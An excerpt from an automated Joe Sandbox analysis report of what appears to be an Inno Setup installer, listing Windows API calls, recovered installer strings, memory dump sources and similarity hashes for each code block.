                                                                                    APIs
                                                                                    • GlobalHandle.KERNEL32 ref: 00406287
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocHandleLockUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2167344118-0
                                                                                    • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                    • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                    • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                    • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                    APIs
                                                                                    • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                                    • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$EnableItemSystem
                                                                                    • String ID: CurPageChanged
                                                                                    • API String ID: 3692539535-2490978513
                                                                                    • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                    • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                                    • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                    • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                                    Strings
                                                                                    • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                                    • Failed to parse "reg" constant, xrefs: 0047907C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                    • API String ID: 3535843008-1938159461
                                                                                    • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                    • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                                    • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                    • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                                    • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                                    Strings
                                                                                    • Will not restart Windows automatically., xrefs: 00481AA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveForeground
                                                                                    • String ID: Will not restart Windows automatically.
                                                                                    • API String ID: 307657957-4169339592
                                                                                    • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                    • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                                    • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                    • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00424975
                                                                                    • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CursorMessageWait
                                                                                    • String ID: +qI
                                                                                    • API String ID: 4021538199-4068327824
                                                                                    • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                    • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                                    • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                    • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                                    Strings
                                                                                    • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                                    • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                    • API String ID: 0-1974262853
                                                                                    • Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                    • Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
                                                                                    • Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                    • Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                                    Strings
                                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                                    • %s\%s_is1, xrefs: 004779B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                    • API String ID: 47109696-1598650737
                                                                                    • Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                                    • Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
                                                                                    • Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                                    • Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                                    • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExecuteMessageSendShell
                                                                                    • String ID: open
                                                                                    • API String ID: 812272486-2758837156
                                                                                    • Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                                    • Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
                                                                                    • Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                                    • Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58
                                                                                    APIs
                                                                                    • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                                      • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                      • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                      • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                      • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                    • String ID: )
                                                                                    • API String ID: 2227675388-1084416617
                                                                                    • Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                                    • Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
                                                                                    • Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                                    • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window
                                                                                    • String ID: /INITPROCWND=$%x $@
                                                                                    • API String ID: 2353593579-4169826103
                                                                                    • Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                                    • Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
                                                                                    • Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                                    • Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98
                                                                                    APIs
                                                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$AllocByteCharFreeMultiWide
                                                                                    • String ID: NIL Interface Exception$Unknown Method
                                                                                    • API String ID: 3952431833-1023667238
                                                                                    • Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                                    • Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
                                                                                    • Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                                    • Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                                    • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                                      • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                    • String ID: D
                                                                                    • API String ID: 3798668922-2746444292
                                                                                    • Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                                    • Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
                                                                                    • Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                                    • Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628
                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$EnumQuery
                                                                                    • String ID: Inno Setup: No Icons
                                                                                    • API String ID: 1576479698-2016326496
                                                                                    • Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                    • Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
                                                                                    • Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                                    • Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
                                                                                    APIs
                                                                                      • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(74600000,0047FFE2), ref: 0047BB46
                                                                                      • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                                      • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                                    Strings
                                                                                    • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                                    • API String ID: 1717587489-3199836293
                                                                                    • Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                                    • Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
                                                                                    • Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                                    • Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
                                                                                    APIs
                                                                                      • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                    • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteFileHandleMutexRelease
                                                                                    • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                    • API String ID: 3841931355-3392794427
                                                                                    • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                    • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                                    • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                                    • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                                    APIs
                                                                                    • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                                    • GetFocus.USER32 ref: 00421D69
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
